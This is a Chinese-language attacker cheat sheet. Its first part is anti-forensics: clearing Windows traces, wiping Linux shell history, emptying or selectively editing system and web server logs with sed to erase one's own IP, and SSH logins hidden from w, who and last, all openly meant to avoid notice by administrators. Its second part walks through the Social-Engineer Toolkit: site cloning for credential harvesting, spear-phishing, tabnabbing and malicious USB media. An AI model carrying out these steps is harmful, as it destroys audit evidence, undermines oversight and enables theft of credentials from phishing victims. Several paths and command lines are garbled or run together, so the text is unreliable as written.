進入注冊表編輯器,找到HKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru5603分支,從中選擇不需要的或是不想讓別人看到的記錄刪除即可。

清理“我最近的文檔”中的歷史記錄

• 在任務欄上右單擊,打開“任務欄和開始菜單屬性”對話框。單擊“開始菜單”“自定義”“高級”,單擊“清理”按鈕即可清理最近訪問過的全部文檔。如圖2。
• 如果只想刪除自己的記錄,可以進入資源管理器中的“C:Documentsnnd SettingsAdminnisyror(用戶自己的帳號)Recent”文件夾,刪去自己不想要別人看到的文檔即可。

禁止顯示上一次登錄者的名稱

進入注冊表編輯器,找到HKEY_ LOCAL_ MACHINE Software Microsoft windowsNT Currentversion Winlogin 分支,新建一個“DontDisplayLastUserName”的字符串值,并設為“1”,重新啟動后,就再不會顯示上次登錄的用戶名了,當需要顯示上次登錄的用戶名時設為“0”即可。

清理“回收站”

• 在windows中簡單地刪除文件只是將文件轉移到了“回收站”中,隨時可以恢復查看。比較保險的做法是按住shift再點“刪除”,或右擊桌面上的“回收站”,選擇“屬性”,在“全局”選項卡中選擇“所有驅動器均使用同一設置”,然后勾選下方的“刪除時不將文件移回回收站,而是直接刪除”,單擊“確定”。

清理剪切板中的記錄

• 剪貼板里有時會隱藏著我們太多的秘密,如果不關機就直接離開,下一個上機的人只要按一下Ctrl+V,剛才在剪貼板中的信息就被別人“盜取”了。無需研究如何清空剪貼板,只需用Ctrl+C再隨便復制一段無關的內容,原來的內容就會被覆蓋。

清理TEMP文件夾中的記錄

• 許多應用程序通常會臨時保存你的工作結果,離機前應刪除被存放在C:(系統安裝盤符)Documents and SettingsAdministrator(當前登錄用戶)Local SettingsTemp目錄下的臨時文件。

Linux

修改文件時間戳

ls -l test.txt# 修改文件的修改時間和訪問時間touch -d "2018-04-18 08:00:00" test.txttouch -t 0101080000 test

清除history歷史命令記錄

#方法1

history       # 查看歷史操作命令(在Kali Linux下無效)cat  ~/.bash_history       # history記錄文件vim ~/.bash_historyhistory –c

#方法2

使用vim打開一個文件

vim test.txt# 設置vim不記錄命令,vim會將命令歷史記錄,保存在viminfo文件中。:set history=0:!command

#方法3

#通過修改配置文件/etc/profile,使系統不再保存命令記錄。默認情況下歷史命令將保存1000條,可以將該值改為0,然后保存并退出,最后重啟系統使得配置文件生效。

HISTSIZE=0

#方法4

#登錄后執行下面命令,不記錄歷史命令(.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

#方法5

僅在Kali Linux下

rm -rf /root/.zsh_history

清除系統日志痕跡

/var/log/btmp 記錄所有登錄失敗信息,使用lastb命令查看

/var/log/lastlog 記錄系統中所有用戶最后一次登錄時間的日志,使用lastlog命令查看

/var/log/wtmp記錄所有用戶的登錄、注銷信息,使用last命令查看

/var/log/utmp記錄當前已經登錄的用戶信息,使用w,who,users等命令查看

/var/log/secure 記錄與安全相關的日志信息

/var/log/message 記錄系統啟動后的信息和錯誤日志

echo > /var/log/btmp:#清除登錄系統失敗的記錄,查看用lastb命令

echo > /var/log/wtmp:#清除登錄系統成功的記錄,查看用last命令

echo > /var/log/lastlog:清除用戶最后一次登錄時間,查看用lastlog命令

echo >/var/log/utmp:清除當前登錄用戶的信息,查看使用w,who,users等命令

cat /dev/null >/var/log/secure:清除安全日志記錄

cat /dev/null >/var/log/message:清除系統日志記錄

echo > /var/log/secure //登錄信息

echo > /var/log/messages

echo>/var/log/syslog //記錄系統日志的服務

echo>/var/log/xferlog

echo>/var/log/auth.log

echo>/var/log/user.log

cat /dev/null > /var/adm/sylog

cat /dev/null > /var/log/maillog

cat /dev/null > /var/log/openwebmail.log

cat /dev/null > /var/log/mail.info

清除系統日志痕跡

#日志文件全部被清空,太容易被管理員察覺了,如果只是刪除或替換部分關鍵日志信息,那么就可以完美隱藏攻擊痕跡。

# 刪除所有匹配到字符串的行,比如以當天日期或者自己的登錄IP

sed -i '/自己的ip/'d test.txt

sed -i '/192.168.1.2/'d test.txt

# 全局替換登錄IP地址:

sed 's/要被取代的字串/新的字串/g'

sed -i 's/192.168.1.1/192.168.1.2/g' test.txt

隱藏遠程SSH登錄記錄

#隱身登錄系統,不會被w、who、last等指令檢測到。

ssh -T root@192.168.0.1 /bin/bash -i

#不記錄ssh公鑰在本地.ssh目錄中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –I

清除Web入侵痕跡

#直接替換日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' apache/logs/access.log

#常見日志地址

Apache

%APATCH_HOME%//logs/access.log # 訪問日志

%APATCH_HOME%/logs/error.log # 錯誤日志

Nginx

%NHINX_HOME%/logs/access.log # 訪問日志

%NHINX_HOME%/logs/error.log # 錯誤日志

Tomcat

%TOMCAT_HOME%/logs/localhost_access_log.YYYY_MM_DD.txt # 請求日志

%TOMCAT_HOME%/logs/catalina.YYYY_MM_DD.log # 啟動日志

%TOMCAT_HOME%/logs/localhost.YYYY_MM_DD.log # 本地日志

%TOMCAT_HOME%/logs/host-manager.YYYY_MM_DD.log # manager管理日志

%TOMCAT_HOME%/logs/manager.YYYY_MM_DD.log # manager專有日志

清除MySQL痕跡

rm ~/.mysql_historycat /dev/null > ~/.mysql_history

社會工程學

git clone https://github.com/trustedsec/social-engineer-toolkit/setoolkit/cd setoolkitpip3 install -r requirements.txtpython setup.pygedit /etc/setoolkit/set.config

網絡釣魚攻擊(Spear-Phishing Attack Vector)

利用文件格式漏洞(如PDF)等生成后門并通過email(GMAIL,SENDMAIL,)向目標發送帶后門附件的電子郵件,誘使目標打開附件激活后門。

例子:

#cd /usr/share/set# ./setoolkit select from the menu1) Social-Engineering Attacks1) Perform a Mass Email Attack3) Credential Harvester Attack Method2) Site Cloner…set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.0.150]: 192.168.0.150set:webattack> Enter the url to clone: www.baidu.com[*] Cloning the website: http://www.baidu.com[*] This could take a little bit...The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.[*] The Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:

WEB 方式攻擊

SET 可以克隆一個網站并植入后門以此迷惑目標打開此網站并中招。

Java Applet 方式

最成功的方式之一,并不是利用java 的漏洞,而是當目標瀏覽含后門的仿冒站點時會被詢問是否允許執行web 中的java applet,一旦點擊允許則payload 開始運行,目標將被重定向到真實的網站。

用戶端(Client-side)web exploit 方式

利用用戶端存在的軟件漏洞,一般使用0day進行攻擊的效果最好。

賬號密碼獲取(Username and Password Harvesting)

通過克隆一個目標站并誘使攻擊目標登陸,截獲其賬號密碼。例如截獲GMAIL 密碼。

標簽頁綁架(Tabnabbing):當目標打開多個標簽頁瀏覽網站并切換標簽頁時,網站偵測到目標的行為并顯示讓目標等待的信息,恰好目標打開了被綁架的標簽頁并要求在相似程度驚人的網站里輸入登陸憑據,當目標輸入之后登陸信息即被截獲,同時被重定向到真實網站。

中間人攻擊(Man-Left-in-the-Middle)

此方式使用已經被攻陷的網站的HTTP 請求或者網站的XSS 漏洞讓用戶的登陸信息發送至攻擊者的HTTP 服務器。如果你發現了一個網站的XSS 漏洞,可以利用此漏洞構造一個URL發送給目標誘使其打開并登陸以截獲登陸信息。

Web Jacking

當目標打開我們的網站時會有一個鏈接顯示為正確的web 地址,此時若目標打開此仿冒鏈接會被定向到我們的仿冒網站,其登陸信息會被截獲。

混合模式(multi-attack)

可同時使用以上多種攻擊手段以提高成功率。

介質感染攻擊(Infectious Media Generator)

可以讓你生成一張光盤或者U盤,里面包含autorun.inf 來運行指定的后門文件或者file-format 漏洞文件。

迷你USB 人機接口設備(Teensy USB HID)

當電腦插入USB 設備且autorun.inf 被禁用時,可使用此方法將USB 設備模擬成一個鍵盤或鼠標設備,進而截獲目標機器的擊鍵記錄。

SET 其他特殊功能

包括SET 交互式shell,可用來替代meterpreter;遠程管理工具(RATTE);HTTP 隧道,當目標主機只開放HTTP 端口對外放行時可通過此功能與主機進行通信;WEB-GUI,包含了常用攻擊和無線攻擊向導,輸入./set-web 即可運行。